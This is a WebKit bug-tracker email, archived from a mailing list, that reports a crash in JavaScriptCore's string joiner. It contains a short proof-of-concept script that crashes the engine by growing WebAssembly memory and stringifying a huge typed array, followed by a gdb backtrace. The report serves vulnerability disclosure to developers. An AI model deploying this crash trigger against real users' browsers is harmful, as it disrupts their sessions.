[Webkit-unassigned] [Bug 233029] New: crash in SC::JSStringJoiner::append8Bit

bugzilla-daemon at webkit.org bugzilla-daemon at webkit.org
Thu Nov 11 22:35:51 PST 2021 

https://bugs.webkit.org/show_bug.cgi?id=233029

            Bug ID: 233029
           Summary: crash in SC::JSStringJoiner::append8Bit
           Product: WebKit
           Version: WebKit Local Build
          Hardware: All
                OS: Linux
            Status: NEW
          Severity: Normal
          Priority: P2
         Component: JavaScriptCore
          Assignee: webkit-unassigned at lists.webkit.org
          Reporter: zhunkibatu at gmail.com

Created attachment 444048

  --> https://bugs.webkit.org/attachment.cgi?id=444048&action=review

the minimal poc

the following poc can crash jsc.
#####################################################################

function test() {
    let maxSize = 0x10000;
        var memory = new WebAssembly.Memory({ initial: 0x100 });
        memory.grow(maxSize - 0x100);
        var result = String(new Uint8Array(memory.buffer));
}

test();

######################################################################

#0  WTF::Vector<WTF::StringViewWithUnderlyingString, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc>::uncheckedAppend<WTF::StringViewWithUnderlyingString> (value=..., this=0x7fffffffc5d8)
    at WTF/Headers/wtf/Vector.h:1391
#1  WTF::Vector<WTF::StringViewWithUnderlyingString, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc>::uncheckedAppend (value=..., this=0x7fffffffc5d8) at WTF/Headers/wtf/Vector.h:782
#2  JSC::JSStringJoiner::append8Bit (string=..., this=0x7fffffffc5c0)
    at ../../Source/JavaScriptCore/runtime/JSStringJoiner.h:91
#3  JSC::JSStringJoiner::appendNumber (value=<optimized out>, vm=..., this=0x7fffffffc5c0)
    at ../../Source/JavaScriptCore/runtime/JSStringJoiner.h:165
#4  JSC::JSStringJoiner::appendWithoutSideEffects (value=..., globalObject=<optimized out>, 
    this=0x7fffffffc5c0) at ../../Source/JavaScriptCore/runtime/JSStringJoiner.h:121
#5  JSC::JSStringJoiner::append (value=..., globalObject=<optimized out>, this=0x7fffffffc5c0)
    at ../../Source/JavaScriptCore/runtime/JSStringJoiner.h:154
#6  JSC::genericTypedArrayViewProtoFuncJoin<JSC::JSGenericTypedArrayView<JSC::Uint8Adaptor> >(JSC::VM&, JSC::JSGlobalObject*, JSC::CallFrame*)::{lambda(WTF::StringView)#1}::operator()(WTF::StringView) const (this=this at entry=0x7fffffffc690, separator=...)
    at ../../Source/JavaScriptCore/runtime/JSGenericTypedArrayViewPrototypeFunctions.h:291
#7  0x00007ffff67456ab in JSC::genericTypedArrayViewProtoFuncJoin<JSC::JSGenericTypedArrayView<JSC::Uint8Adaptor> > (callFrame=0x7fffffffc6f0, globalObject=<optimized out>, vm=...)
    at WTF/Headers/wtf/text/StringView.h:340
#8  JSC::typedArrayViewProtoFuncJoin (globalObject=<optimized out>, callFrame=0x7fffffffc6f0)
    at ../../Source/JavaScriptCore/runtime/JSTypedArrayViewPrototype.cpp:301
#9  0x00007ffff21b78b9 in vmEntryToNative ()
    at ../../Source/JavaScriptCore/llint/LowLevelInterpreter.cpp:536
#10 0x00007ffff514b9e0 in JSC::Interpreter::executeCall (this=<optimized out>, 
    lexicalGlobalObject=lexicalGlobalObject at entry=0x7fffae9f9068, function=<optimized out>, 
    callData=..., thisValue=..., args=...)
    at ../../Source/JavaScriptCore/runtime/NativeFunction.h:92
#11 0x00007ffff5da2e0a in JSC::call (globalObject=globalObject at entry=0x7fffae9f9068, 
    functionObject=..., functionObject at entry=..., callData=..., thisValue=..., thisValue at entry=..., 
    args=...) at ../../Source/JavaScriptCore/runtime/JSObject.h:1385
#12 0x00007ffff5d104c6 in JSC::arrayProtoFuncToString (globalObject=0x7fffae9f9068, 
    callFrame=<optimized out>) at ../../Source/JavaScriptCore/runtime/JSCJSValueInlines.h:462
#13 0x00007ffff21b78b9 in vmEntryToNative ()
    at ../../Source/JavaScriptCore/llint/LowLevelInterpreter.cpp:536
#14 0x00007ffff514b9e0 in JSC::Interpreter::executeCall (this=<optimized out>, 
    lexicalGlobalObject=lexicalGlobalObject at entry=0x7fffae9f9068, function=<optimized out>, 
    callData=..., thisValue=..., args=...)
    at ../../Source/JavaScriptCore/runtime/NativeFunction.h:92
#15 0x00007ffff5da2e0a in JSC::call (globalObject=globalObject at entry=0x7fffae9f9068, 
    functionObject=..., functionObject at entry=..., callData=..., thisValue=..., thisValue at entry=..., 
    args=...) at ../../Source/JavaScriptCore/runtime/JSObject.h:1385
#16 0x00007ffff6617216 in JSC::callToPrimitiveFunction<(JSC::CachedSpecialPropertyKey)1> (
    hint=JSC::PreferString, propertyName=..., object=<optimized out>, globalObject=<optimized out>)
    at ../../Source/JavaScriptCore/runtime/JSCJSValueInlines.h:462
#17 JSC::JSObject::ordinaryToPrimitive (this=<optimized out>, globalObject=<optimized out>, 
    hint=<optimized out>) at ../../Source/JavaScriptCore/runtime/JSObject.cpp:2326
#18 0x00007ffff662d27e in JSC::JSObject::toPrimitive (this=0x7fffef1c0c48, 
    globalObject=globalObject at entry=0x7fffae9f9068, 
    preferredType=preferredType at entry=JSC::PreferString)
    at ../../Source/JavaScriptCore/runtime/JSObject.cpp:2360
#19 0x00007ffff632c174 in JSC::JSValue::toStringSlowCase (this=this at entry=0x7fffffffcf98, 
--Type <RET> for more, q to quit, c to continue without paging--
    globalObject=0x7fffae9f9068, returnEmptyStringOnError=returnEmptyStringOnError at entry=true)
    at ../../Source/JavaScriptCore/runtime/JSObject.h:1385
#20 0x00007ffff6be94de in JSC::JSValue::toString (globalObject=<optimized out>, 
    this=<optimized out>) at ../../Source/JavaScriptCore/runtime/JSString.h:1060
#21 JSC::stringConstructor (argument=..., globalObject=<optimized out>)
    at ../../Source/JavaScriptCore/runtime/StringConstructor.cpp:158
#22 JSC::callStringConstructor (callFrame=<optimized out>, globalObject=<optimized out>)
    at ../../Source/JavaScriptCore/runtime/StringConstructor.cpp:166
#23 JSC::callStringConstructor (globalObject=<optimized out>, callFrame=<optimized out>)
    at ../../Source/JavaScriptCore/runtime/StringConstructor.cpp:161
#24 0x00007fffaf0ff027 in ?? ()
#25 0x00007fffffffd070 in ?? ()
#26 0x00007ffff21d443c in js_trampoline_op_call ()
    at ../../Source/JavaScriptCore/llint/LowLevelInterpreter.cpp:536
#27 0x0000000000000000 in ?? ()

-- 
You are receiving this mail because:
You are the assignee for the bug.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.webkit.org/pipermail/webkit-unassigned/attachments/20211112/0c856431/attachment-0001.htm>

More information about the webkit-unassigned mailing list